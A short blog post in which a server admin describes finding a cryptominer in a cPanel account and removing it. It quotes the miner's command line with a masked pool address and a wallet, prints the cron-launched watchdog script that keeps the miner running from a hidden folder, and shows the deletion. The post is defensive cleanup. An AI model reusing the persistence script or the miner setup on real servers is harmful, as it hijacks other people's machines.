Home » Linux tips » 11 September 2018 » 783 supporters » 2 Comments »

Cpanel server infected with mining software

11 September 2018 783 supporters 2 Comments

Cpanel miningRecently one of server under my control infected with mining software. It cause unnecessary load and waste of server resource.

Since the server is using Cpanel, I must use WHM to track down the source. I check WHM ‘Process Manager’ and ‘Daily process log’ and found something similar like :

impxxxx impxxxxketing.com 98.5 -bash -a cryptonight -o stratum+tcp://xx.xx.xx.xx:14444 -u 4AmprS3UsK28LE9pHnt9TXDZygXoVtnQ6eFkD5ghP7TwPZ7tKkhQJn1Z3SUCbmw7xcA8F6pnQBpEzfQ2BGdTXo6BEs7MFHZ -p x

Using ‘Process Manager’ to kill the pid who is running the process.

I have check in the user Cpanel and found strange cronjob point to strange path eg :

/home/impxxxx/public_html/nrxxxxment/includes/.qts/upd

So I read the content of the file using cat command:

[root@svr2 ~]# cat /home/impxxxx/public_html/nrxxxxment/includes/.qts/upd
#!/bin/sh
if test -r /home/impxxxx/public_html/nrxxxxment/includes/.qts/bash.pid; then
pid=$(cat /home/impxxxx/public_html/nrxxxxment/includes/.qts/bash.pid)
if $(kill -CHLD $pid >/dev/null 2>&1)
then
exit 0
fi
fi
cd /home/impxxxx/public_html/nrxxxxment/includes/.qts
./r &>/dev/null

Go to the folder contents and see what is inside the folder:

[root@svr2 ~]# cd /home/impxxxx/public_html/nrxxxxment/includes/.qts/
[root@svr2 .qts]# ls
a bash.pid cron.d dir.dir f g m p r s t upd x

The existence of bash.pid confirm that the mining come from that path.

Delete the folder and delete the cronjob so the mining stop.

[root@svr2 .qts]# cd ..
[root@svr2 includes]# rm -rfv .qts
removed ‘.qts/f’
removed ‘.qts/x’
removed ‘.qts/cron.d’
removed ‘.qts/t’
removed ‘.qts/s’
removed ‘.qts/p’
removed ‘.qts/dir.dir’
removed ‘.qts/bash.pid’
removed ‘.qts/a’
removed ‘.qts/upd’
removed ‘.qts/g’
removed ‘.qts/m’
removed ‘.qts/r’
removed directory: ‘.qts’




2 Comments »

  • kumail said:

    Do you have any idea of how they infected the server in the first place? how did they upload the bash.pid file onto the server?

  • admin (author) said:

    Outdated script…

Leave your response!

Add your comment below, or trackback from your own site. You can also subscribe to these comments via RSS.

Be nice. Keep it clean. Stay on topic. No spam.

You can use these tags:
<a href="" title=""> <abbr title=""> <acronym title=""> <b> <blockquote cite=""> <cite> <code> <del datetime=""> <em> <i> <q cite=""> <s> <strike> <strong>

This is a Gravatar-enabled weblog. To get your own globally-recognized-avatar, please register at Gravatar.